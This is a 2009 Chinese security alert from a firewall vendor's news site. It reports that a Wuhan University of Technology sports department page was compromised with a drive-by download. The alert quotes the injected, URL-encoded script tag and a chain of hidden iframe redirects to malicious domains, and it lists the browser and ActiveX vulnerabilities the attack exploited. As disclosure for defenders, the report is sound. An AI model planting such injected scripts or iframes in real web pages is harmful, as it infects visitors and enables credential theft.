关于冰盾 | 使用条款 | 网站地图
 
警报:武汉理工大体育部网站遭遇黑客挂马
警报:武汉理工大体育部网站遭遇黑客挂马
作者:冰盾防火墙 网站:www.bingdun.com 日期:2009-03-03
 
2009年2月27日,武汉理工大体育部(hxxp://202.114.88.142/showart.asp?art_id=298)被黑客植入病毒,用户如果访问该网站,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。

  该网站问题代码:

 

<script src=hxxp://%68%68%6A%39%2E%63%6E></script><html>

 

解密后获得连接:hxxp://hhj9.cn/

  hxxp://hhj9.cn/恶意代码框架:

 

document.writeln("<Iframe src=hxxp:\/\/www.love6289.cn\/b2.htm width=50 height=0><\/iframe>")

 

hxxp://www.love6289.cn/b2.htm问题代码框架:

 

<iframe src=hxxp://www.sll9026.cn/a2/fxx.htm width=100 height=0></Iframe>

 

hxxp://www.sll9026.cn/a2/fxx.htm网马代码框架:

 该网马利用以下漏洞来传播:

  MS06014漏洞

  微软IE7 0day漏洞

  Adobe Flash Player SWF文件漏洞

  UUSee网络电视2008 UUUpgrade ActiveX Exploit

  联众世界游戏GLCHAT.GLChatCtrl.1 ActiveX控件漏洞

  暴风影音播放器MPS.StormPlayer漏洞

  RealPlayer播放器IERPCtl.IERPCtl.1漏洞

  以上病毒文件为下载者木马和游戏盗号木马,自动运行后将会,盗取用户敏感信息,甚至导致死机。由于下载数量太多,这里不一一分析。

  注:被挂马的地址是:hxxp://202.114.88.142/showart.asp?art_id=298

()冰盾新闻中心提供

 

 
最新内容:
安装和升级冰盾防火墙需要注意的问题[2006-02-08]
易被黑客窃听 VoIP安全需要另眼相看[2009-03-02]
玩家被盗号怒砸游戏公司 网游厂商安全堪忧[2009-03-02]
时代华纳DNS服务器遭受攻击 订户网络访问受影响[2009-02-27]
名校毕业生当黑客 控制全国六成木马盗号市场[2009-02-26]
猫癣病毒“躲猫猫” 移师广东东莞月入百万[2009-02-26]
相关内容:
黑客盯上网络“年货交换”[2009-02-12]
黑客攻击微软IE漏洞 挂马网页逾两万[2008-12-16]
利用微软IE未知漏洞的挂马网页已有数千个[2008-12-12]
警惕IE7 0DAY攻击代码已遭挂马攻击利用[2008-12-11]
“黑五类” 黑客最爱挂马的五类网站[2008-11-24]

合作伙伴: 黑基网 补天科技 威盾科技 站长下载 新飞金信 北京电信 ZOL应用下载
中华人民共和国增值电信业务经营许可证京ICP备14024464 公安备案号 京1081234 
版权所有©2003-2014 冰盾防火墙  www.BingDun.com 法律声明
总机:(010)51661195